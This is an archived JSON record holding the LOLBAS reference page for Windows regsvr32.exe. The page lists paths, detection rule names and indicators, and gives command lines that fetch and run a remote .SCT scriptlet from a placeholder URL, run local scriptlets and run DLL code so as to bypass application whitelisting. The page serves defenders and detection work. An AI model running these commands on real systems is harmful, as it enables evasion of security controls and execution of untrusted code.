{
	"id": "cd8a4ab4-43c1-4484-a85d-17a16845edd0",
	"created_at": "2026-04-06T00:17:57.621105Z",
	"updated_at": "2026-04-10T03:21:58.704854Z",
	"deleted_at": null,
	"sha1_hash": "9ea93d13f2a56d384c55d8420daa491e708ae2b0",
	"title": "Regsvr32 on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63300,
	"plain_text": "Regsvr32 on LOLBAS\r\nArchived: 2026-04-05 17:34:21 UTC\r\nRegsvr32.exe\r\nUsed by Windows to register DLLs\r\nPaths:\r\nC:\\Windows\\System32\\regsvr32.exe\r\nC:\\Windows\\SysWOW64\\regsvr32.exe\r\nResources:\r\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\r\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nDetections:\r\nSigma: proc_creation_win_regsvr32_susp_parent.yml\r\nSigma: proc_creation_win_regsvr32_susp_child_process.yml\r\nSigma: proc_creation_win_regsvr32_susp_exec_path_1.yml\r\nSigma: proc_creation_win_regsvr32_network_pattern.yml\r\nSigma: net_connection_win_regsvr32_network_activity.yml\r\nSigma: dns_query_win_regsvr32_network_activity.yml\r\nSigma: proc_creation_win_regsvr32_flags_anomaly.yml\r\nSigma: file_event_win_net_cli_artefact.yml\r\nSplunk: detect_regsvr32_application_control_bypass.yml\r\nElastic: defense_evasion_suspicious_managedcode_host_process.toml\r\nElastic: execution_register_server_program_connecting_to_the_internet.toml\r\nIOC: regsvr32.exe retrieving files from Internet\r\nIOC: regsvr32.exe executing scriptlet (sct) files\r\nIOC: DotNet CLR libraries loaded into regsvr32.exe\r\nIOC: DotNet CLR Usage Log - regsvr32.exe.log\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nPage 1 of 4\r\nAWL bypass\r\n1. Execute the specified remote .SCT script with scrobj.dll.\r\nregsvr32 /s /n /u /i:https://www.example.org/file.sct scrobj.dll\r\nUse case\r\nExecute code from remote scriptlet, bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute: Remote\r\n2. Execute the specified local .SCT script with scrobj.dll.\r\nregsvr32.exe /s /u /i:file.sct scrobj.dll\r\nUse case\r\nExecute code from scriptlet, bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute\r\n1. Execute the specified remote .SCT script with scrobj.dll.\r\nregsvr32 /s /n /u /i:https://www.example.org/file.sct scrobj.dll\r\nUse case\r\nExecute code from remote scriptlet, bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute: Remote\r\n2. Execute the specified local .SCT script with scrobj.dll.\r\nregsvr32.exe /s /u /i:file.sct scrobj.dll\r\nUse case\r\nExecute code from scriptlet, bypass application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\n3. Execute code in a DLL. The code must be inside the exported function DllRegisterServer.\r\nregsvr32.exe /s file.dll\r\nUse case\r\nExecute DLL file\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: DLL\r\n4. Execute code in a DLL. The code must be inside the exported function DllUnRegisterServer.\r\nregsvr32.exe /u /s file.dll\r\nUse case\r\nExecute DLL file\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: DLL\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
	],
	"report_names": [
		"Regsvr32"
	],
	"threat_actors": [],
	"ts_created_at": 1775434677,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.pdf",
		"text": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.txt",
		"img": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.jpg"
	}
}